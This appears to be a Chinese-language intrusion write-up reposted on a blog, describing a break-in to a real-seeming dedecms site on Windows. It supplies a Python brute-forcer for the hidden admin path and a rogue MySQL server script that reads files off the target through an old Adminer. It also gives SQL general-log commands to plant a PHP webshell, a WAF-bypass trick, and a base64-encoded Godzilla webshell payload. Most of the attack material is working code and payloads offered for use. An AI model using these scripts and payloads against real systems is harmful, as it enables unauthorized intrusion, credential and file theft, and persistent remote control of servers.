又是無(wú)聊的一天打開高危掃描器開掃，結(jié)果啥也沒(méi)掃出來(lái)，然后就開始苦逼的一個(gè)一個(gè)站看了。然后發(fā)現(xiàn)下面這個(gè)站dedecms，服務(wù)器windows

?

?

各種歷史洞打了一遍都沒(méi)用，因?yàn)槭莣indows可以用這個(gè)跑下后臺(tái)

import requests import itertools characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#" back_dir = "" flag = 0 url = "http://www.test.com/tags.php" data = {"_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif","_FILES[mochazz][name]" : 0,"_FILES[mochazz][size]" : 0,"_FILES[mochazz][type]" : "image/gif" }for num in range(1,7):if flag:breakfor pre in itertools.permutations(characters,num):pre = ''.join(list(pre))data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)print("testing",pre)r = requests.post(url,data=data)if "Upload filetype not allow !" not in r.text and r.status_code == 200:flag = 1back_dir = predata["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"breakelse:data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" print("[+] 前綴為：",back_dir) flag = 0 for i in range(30):if flag:breakfor ch in characters:if ch == characters[-1]:flag = 1breakdata["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)r = requests.post(url, data=data)if "Upload filetype not allow !" not in r.text and r.status_code == 200:back_dir += chprint("[+] ",back_dir)data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"breakelse:data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"print("后臺(tái)地址為：",back_dir)

?

結(jié)果跑完居然是dede，這就扯了我訪問(wèn)dede是404.

?

如果找到后臺(tái)的話還可以用這個(gè)洞猜一下管理員賬號(hào)：
http://www.yulegeyu.com/2018/09/20/dedecms-guess-admin-username-trick/
山窮水盡了隨手試了一下adminer.php居然存在（掃描器里有adminer.php的估計(jì)掃的目錄太多了被封ip了所以不要相信掃描器）

adminer低版本可以利用mysql服務(wù)端惡意讀取客戶端文件

mysql_client.py代碼

#coding=utf-8 import socket import logging import sys logging.basicConfig(level=logging.DEBUG)filename=sys.argv[1] sv=socket.socket() sv.setsockopt(1,2,1) sv.bind(("",3306)) sv.listen(5) conn,address=sv.accept() logging.info('Conn from: %r', address) conn.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00") conn.recv(9999) logging.info("auth okay") conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00") conn.recv(9999) logging.info("want file...") wantfile=chr(len(filename)+1)+"\x00\x00\x01\xFB"+filename conn.sendall(wantfile) content=conn.recv(9999) logging.info(content) conn.close()

?

使用方法直接服務(wù)器執(zhí)行
python mysql_client.py "F:\dede\index.php"
然后adminer填你服務(wù)器地址，賬號(hào)密碼隨便填連接就讀到了文件，服務(wù)器3306端口要對(duì)外開放
然后就是又開始讀文件了，先隨意讀一下，讓它報(bào)出web路徑來(lái)

因?yàn)槭莇edecms所以直接讀?data\common.inc.php

文件不存在？直接放F盤下讀一下

發(fā)現(xiàn)賬號(hào)為root，直接登錄adminer.php通過(guò)日志getshell

set global general_log=on?開啟general log模式set global general_log_file='F:\\*****\\shell.php';?設(shè)置日志路徑select '<?php eval($_POST['pwd']);?>';?寫shell毫無(wú)疑問(wèn)最后這里被攔了，抓個(gè)包來(lái)測(cè)吧，select '<?php '不攔

select+'<?php+phpinfo();+?>'攔掉

使用注釋換行繞過(guò)select+'<?php+//%0Aphpinfo();+?>'

寫個(gè)哥斯拉的馬

select '<?php //"%0A$a="ICAgIHNlc3Npb25fc3RhcnQoKTsKICAgIEBzZXRfdGltZV9saW1pdCgwKTsKCUBlcnJvcl9yZXBvcnRpbmcoMCk7CiAgICBmdW5jdGlvbiBFKCRELCRLKXsKICAgICAgICBmb3IoJGk9MDskaTxzdHJsZW4oJEQpOyRpKyspIHsKICAgICAgICAgICAgJERbJGldID0gJERbJGldXiRLWyRpKzEmMTVdOwogICAgICAgIH0KICAgICAgICByZXR1cm4gJEQ7CiAgICB9CiAgICBmdW5jdGlvbiBRKCREKXsKICAgICAgICByZXR1cm4gYmFzZTY0X2VuY29kZSgkRCk7CiAgICB9CiAgICBmdW5jdGlvbiBPKCREKXsKICAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgkRCk7CiAgICB9CiAgICAkUD0nd2hvYW1pJzsKICAgICRWPSdwYXlsb2FkJzsKICAgICRUPScxYjA2NzliZTcyYWQ5NzZhJzsKICAgIGlmIChpc3NldCgkX1BPU1RbJFBdKSl7CiAgICAgICAgJEY9TyhFKE8oJF9QT1NUWyRQXSksJFQpKTsKICAgICAgICBpZiAoaXNzZXQoJF9TRVNTSU9OWyRWXSkpewogICAgICAgICAgICAkTD0kX1NFU1NJT05bJFZdOwogICAgICAgICAgICAkQT1leHBsb2RlKCd8JywkTCk7CiAgICAgICAgICAgIGNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIG52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgICAgICAgICAgJFI9bmV3IEMoKTsKCQkJJFItPm52b2tlKCRBWzBdKTsKICAgICAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRQLiRUKSwwLDE2KTsKICAgICAgICAgICAgZWNobyBRKEUoQHJ1bigkRiksJFQpKTsKICAgICAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRQLiRUKSwxNik7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICRfU0VTU0lPTlskVl09JEY7CiAgICAgICAgfQogICAgfQ==";eval%01(base64_decode%01($a));//"; ?>'

?

?

成功連上，system

?

總結(jié)

以上是生活随笔為你收集整理的记一次偶遇Adminer的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。